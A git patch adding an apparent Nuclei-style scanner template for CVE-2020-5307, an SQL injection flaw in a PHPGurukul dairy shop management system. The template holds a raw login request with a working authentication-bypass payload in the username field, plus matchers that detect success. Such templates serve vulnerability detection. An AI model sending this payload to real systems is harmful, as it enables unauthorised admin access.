From b9fadff659239bd88e40b322617db1c110de22df Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 25 Jul 2021 11:50:53 +0900 Subject: [PATCH] Create CVE-2020-5307.yaml PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-5307.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2020/CVE-2020-5307.yaml diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml new file mode 100644 index 0000000000..55fcfc1b84 --- /dev/null +++ b/cves/2020/CVE-2020-5307.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-5307 + +info: + name: Dairy Farm Shop Management System - SQL Injection + author: gy741 + description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + reference: | + - https://cinzinga.com/CVE-2020-5307-5308/ + severity: critical + tags: cve,cve2020,sqli + +requests: + - raw: + - | + POST /dfsms/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Connection: close + Content-Length: 66 + + username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "add-category.php" + + - type: status + status: + - 302